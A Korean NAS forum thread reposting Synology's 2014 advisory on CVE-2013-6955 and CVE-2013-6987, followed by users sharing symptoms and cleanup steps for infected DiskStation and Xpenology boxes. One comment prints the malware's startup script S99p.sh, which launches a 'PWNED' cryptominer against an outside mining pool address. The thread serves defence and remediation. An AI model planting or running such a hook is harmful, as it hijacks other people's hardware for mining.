최근 해킹 관련으로 시놀로지로부터의 공지메일

쓰기

최근 해킹 관련으로 시놀로지로부터의 공지메일

2014-02

2014-02-18 07:51:50

조회 6875 추천 1

DSM Important UpdateDear Synology users,

Synology®?confirmed known security issues (reported as CVE-2013-6955 and CVE-2013-6987) which would cause compromise to file access authority in DSM. An updated DSM version resolving these issues has been released accordingly.

The followings are possible symptoms to appear on affected DiskStation and RackStation:

Exceptionally high CPU usage detected in Resource Monitor:
CPU resource occupied by processes such as dhcp.pid, minerd, synodns, PWNED, PWNEDb, PWNEDg, PWNEDm, or any processes with PWNED in their namesAppearance of non-Synology folder:
An automatically created shared folder with the name “startup”, or a non-Synology folder appearing under the path of “/root/PWNED”Redirection of the Web Station:
“Index.php” is redirected to an unexpected pageAppearance of non-Synology CGI program:
Files with meaningless names exist under the path of “/usr/syno/synoman”Appearance of non-Synology script file:
Non-Synology script files, such as?“S99p.sh”, appear under the path of “/usr/syno/etc/rc.d”

If users identify any of above situation, they are strongly encouraged to do the following:

For DiskStation or RackStation running on DSM 4.3, please follow the instruction?here?to REINSTALL?DSM 4.3-3827For DiskStation or RackStation running on DSM 4.0, it’s recommended to REINSTALL DSM 4.0-2259 or onward from Synology?Download CenterFor DiskStation or RackStation running on DSM 4.1 or DSM 4.2, it’s recommended to REINSTALL DSM 4.2-3243 or onward from Synology?Download Center

For other users who haven’t encountered above symptoms, it is recommended to go to
DSM > Control Panel > DSM Update?page, update to versions above to protect DiskStation from malicious attacks.

Synology has taken immediate actions to fix vulnerability at the point of identifying malicious attacks. As proliferation of cybercrime and increasingly sophisticated malware evolves, Synology continues to casting resources mitigating threats and dedicates to providing the most reliable solutions for users. If users still notice their DiskStation behaving suspiciously after being upgraded to the latest DSM version, please contact?********@********.com.

Sincerely,
Synology Development Team

?Copyright ? 2014 Synology Inc. All Rights Reserved. All other product names and company names
or logos mentioned in the e-mail are the properties of their respective ownerswww.synology.comPrivacy Policy

벌써 50대

짧은글 일수록 신중하게.



오나기 2014-02 거의 전부 해당사항이 있어서 큰일이네요 ㅜ.ㅜ; 정품을 사용하자니 돈과 스펙이 안따라주고.. 일단 아래처럼 해주면 CPU사용율을 되돌릴 수 있습니다. ## S99p.sh를 찾아서 내용 확인하고 지웁니다. 내용에서 확인되는 PWNED는 소심하게 이름을 바꿨어요. > cd / > find / -name S99p.sh /usr/syno/etc.defaults/rc.d/S99p.sh > cat /usr/syno/etc.defaults/rc.d/S99p.sh #!/bin/sh su -c "cd /PWNED && ./PWNEDm -o 'stratum+tcp://46.244.18.176:9555' &" -s /bin/sh smmsp su -c "cd /PWNED && ./PWNEDb &" -s /bin/sh smmsp >mv PWNED PWNED_bak >rm /usr/syno/etc.defaults/rc.d/S99p.sh ## CPU를 점거하는 백그라운드 프로세스를 찾아봅니다. >find /proc -name "stat" \| xargs grep "httpd-log.pid" ## 위 검색 결과에서 맨위 파일(PID)을 kill하면 나머지도 kill됩니다. >kill 검색된 PID 원초적인 해결방법을 아시는 능력자께선 정보 공유좀 부탁드립니다! (__) 거의 전부 해당사항이 있어서 큰일이네요 ㅜ.ㅜ; 정품을 사용하자니 돈과 스펙이 안따라주고.. 일단 아래처럼 해주면 CPU사용율을 되돌릴 수 있습니다. ## S99p.sh를 찾아서 내용 확인하고 지웁니다. 내용에서 확인되는 PWNED는 소심하게 이름을 바꿨어요. > cd / > find / -name S99p.sh /usr/syno/etc.defaults/rc.d/S99p.sh > cat /usr/syno/etc.defaults/rc.d/S99p.sh #!/bin/sh su -c "cd /PWNED && ./PWNEDm -o 'stratum+tcp://46.244.18.176:9555' &" -s /bin/sh smmsp su -c "cd /PWNED && ./PWNEDb &" -s /bin/sh smmsp >mv PWNED PWNED_bak >rm /usr/syno/etc.defaults/rc.d/S99p.sh ## CPU를 점거하는 백그라운드 프로세스를 찾아봅니다. >find /proc -name "stat" \| xargs grep "httpd-log.pid" ## 위 검색 결과에서 맨위 파일(PID)을 kill하면 나머지도 kill됩니다. >kill 검색된 PID 원초적인 해결방법을 아시는 능력자께선 정보 공유좀 부탁드립니다! (__)



강성진00 2014-02 보안구멍이 파일스테이션 쪽 cgi 라고 하더군요. 정품 유저라면. 최신버젼 업데이트 하면 간단히 해결되지만. 해놀 사용중이라면 어쩔 수 없이 외부포트 오픈을 포기 하거나.. 파일스테이션을 포기하거나.. 이렇게 둘 중 하나는 포기 해야만 합니다. ----- 파일스테이션 작동 막는 방법은 아래 글에 있습니다. http://www.2cpu.co.kr/bbs/board.php?bo_table=nas&wr_id=1988 보안구멍이 파일스테이션 쪽 cgi 라고 하더군요. 정품 유저라면. 최신버젼 업데이트 하면 간단히 해결되지만. 해놀 사용중이라면 어쩔 수 없이 외부포트 오픈을 포기 하거나.. 파일스테이션을 포기하거나.. 이렇게 둘 중 하나는 포기 해야만 합니다. ----- 파일스테이션 작동 막는 방법은 아래 글에 있습니다. http://www.2cpu.co.kr/bbs/board.php?bo_table=nas&wr_id=1988



김준유 2014-02 정품 사용자라.... 정품 사용자라....



이철우275 2014-02 요기 올라온 cgi 이름 교체하는 방법으로 일단 회피했구요. (저는 imageSelector.cgi 하나밖에 일치하는게 없더군요 4.2라서 그런가?) /usr/syno/etc.defaults/rc.d/S99p.sh 파일 PWNED 폴더 lolz 폴더 /etc/rc.local 파일 일단은 그냥 이름 바꿔놨네요. 요기 올라온 cgi 이름 교체하는 방법으로 일단 회피했구요. (저는 imageSelector.cgi 하나밖에 일치하는게 없더군요 4.2라서 그런가?) /usr/syno/etc.defaults/rc.d/S99p.sh 파일 PWNED 폴더 lolz 폴더 /etc/rc.local 파일 일단은 그냥 이름 바꿔놨네요.



박종령 2014-02 만약 lolz 로 걸렸다면 top 등을 실행하시면 그 폴더에 있던 걸로 실행 되는 듯 하기도 하네요.. 폴더 지우고 cgi 이름들 바꾸고 우선 임시로 했네요. 저는 .. 4대 돌리는 중인데 업데이트 안했던게 걸린거 같더군요. 임시로 하긴 했지만.. 아직도 불안합니다. 부팅 USB 를 새로 작성 하셔서 하시길 권해드립니다. 메인으로 쓰던 게 부팅할 때 보니 lolz 찾는거 같더군요.. 우선 부팅 USB 부터 새로 만드시길.... 만약 lolz 로 걸렸다면 top 등을 실행하시면 그 폴더에 있던 걸로 실행 되는 듯 하기도 하네요.. 폴더 지우고 cgi 이름들 바꾸고 우선 임시로 했네요. 저는 .. 4대 돌리는 중인데 업데이트 안했던게 걸린거 같더군요. 임시로 하긴 했지만.. 아직도 불안합니다. 부팅 USB 를 새로 작성 하셔서 하시길 권해드립니다. 메인으로 쓰던 게 부팅할 때 보니 lolz 찾는거 같더군요.. 우선 부팅 USB 부터 새로 만드시길....



송강민 2014-02 온갖 rc파일 .profile에 lolz관련 스크립트들이 유입되어 있더라구요 저는 리소스 모니터도 안되고 정상적으로 사용이 불가하여 재설치 했습니다. 온갖 rc파일 .profile에 lolz관련 스크립트들이 유입되어 있더라구요 저는 리소스 모니터도 안되고 정상적으로 사용이 불가하여 재설치 했습니다.

로그인 하시면 댓글을 남길 수 있습니다

쓰기

NAS

쓰기

56/304

번호	제목Page 56/304	글쓴이	날짜	조회	추천
	[필독] 처음 오시는 분을 위한 안내 (719)	정은준1	2014-05	4581913	0
[필독] 처음 오시는 분을 위한 안내 (719) 2014-05 4581913 1 정은준1
	(광고) 단통법 시대의 인터넷가입 가이드(ver2.0) (228)	백메가	2015-12	1130517	25
(광고) 단통법 시대의 인터넷가입 가이드(… (228) 2015-12 1130517 1 백메가
4967	N54L 에 XPEnology 6.1 올리신 분들 메모리 인식 잘 되나요? (10)	팝이좋아	2017-05	6953	1
N54L 에 XPEnology 6.1 올리신 분들 메모… (10) 2017-05 6953 1 팝이좋아
4966	랜섬웨어 등의 바이러스가 들어오는 전송 프로토콜? 질문 (7)	푸른해원	2022-07	1986	1
랜섬웨어 등의 바이러스가 들어오는 전송 … (7) 2022-07 1986 1 푸른해원
4965	[질문]xpenology 운영시 HW 레이드 카드의 레이드 문제점을 어떻게 체크 해야 하나요? (4)	안승현	2014-02	4247	1
[질문]xpenology 운영시 HW 레이드 카드의… (4) 2014-02 4247 1 안승현
4964	해놀로지 dsm 5.0-4528 업데이트2 아파치 httpd.conf 파일을 못 찾겠습니다. (5)	xpenology	2014-12	9462	1
해놀로지 dsm 5.0-4528 업데이트2 아파치 … (5) 2014-12 9462 1 xpenology
4963	디스크 교체 문의 (4)	웅이둥이	2015-06	4087	1
디스크 교체 문의 (4) 2015-06 4087 1 웅이둥이
4962	Areca ARC-1280ML, DSM 6.1.6에서 동작됩니다. (3)	통통9	2018-04	4226	1
Areca ARC-1280ML, DSM 6.1.6에서 동작됩… (3) 2018-04 4226 1 통통9
4961	헤놀 케이스 추천좀 부탁 드립니다.. (6)	겨울남자	2020-10	3138	1
헤놀 케이스 추천좀 부탁 드립니다.. (6) 2020-10 3138 1 겨울남자
4960	최근 해킹 관련으로 시놀로지로부터의 공지메일 (6)	김준유	2014-02	6876	1
최근 해킹 관련으로 시놀로지로부터의 공… (6) 2014-02 6876 1 김준유
4959	gnoboot + 4493 update 7 쓰시는 분들께 질문이 있습니다... (3)	곽봉효	2014-10	5751	1
gnoboot + 4493 update 7 쓰시는 분들께 … (3) 2014-10 5751 1 곽봉효
4958	ds 다운로드가 안되네요.. (다운로드스테이션) (4)	ddyy	2014-10	5987	1
ds 다운로드가 안되네요.. (다운로드스테… (4) 2014-10 5987 1 ddyy
4957	헤놀 올리고 헤롱헤롱 합니다. (10)	개구쟁	2016-07	6439	1
헤놀 올리고 헤롱헤롱 합니다. (10) 2016-07 6439 1 개구쟁
4956	HDD 선택에 대한 개인적인 생각... (8)	안승현	2013-12	6919	1
HDD 선택에 대한 개인적인 생각... (8) 2013-12 6919 1 안승현
4955	식은 땀 나네요. 해놀로지 하드 인식이 하나 안됩니다. (1)	꾀돌이	2014-11	7037	1
식은 땀 나네요. 해놀로지 하드 인식이 하… (1) 2014-11 7037 1 꾀돌이
4954	시놀로지에서 저장된 자료를 torrent 로 배포할 수 있을까요? (14)	s김종화z	2014-12	18697	1
시놀로지에서 저장된 자료를 torrent 로 … (14) 2014-12 18697 1 s김종화z
4953	DSM6.0을 올려봤습니다. (3)	뚜껑따버리기	2015-10	8983	1
DSM6.0을 올려봤습니다. (3) 2015-10 8983 1 뚜껑따버리기
4952	내부망 와이파이에서 DSM 접속 및 WebDAV 접속이 안됩니다. (3)	쾌남횬이	2015-10	8840	1
내부망 와이파이에서 DSM 접속 및 WebDAV … (3) 2015-10 8840 1 쾌남횬이
4951	xpenology 새폴더 만들기 질문드립니다. (2)	난다곰	2015-02	5761	1
xpenology 새폴더 만들기 질문드립니다. (2) 2015-02 5761 1 난다곰
4950	HP microserver GEN8 최초전원 투입했는데... (9)	루팅	2015-08	5359	1
HP microserver GEN8 최초전원 투입했는데… (9) 2015-08 5359 1 루팅
4949	아무것도 모르는 사람입니다. ㅎ놀리지 관련 질문드립니다. (9)	콘스탄틴	2021-06	1379	1
아무것도 모르는 사람입니다. ㅎ놀리지 관… (9) 2021-06 1379 1 콘스탄틴
4948	nas에 기타 프로그램설치? (2)	임상경	2015-03	8230	1
nas에 기타 프로그램설치? (2) 2015-03 8230 1 임상경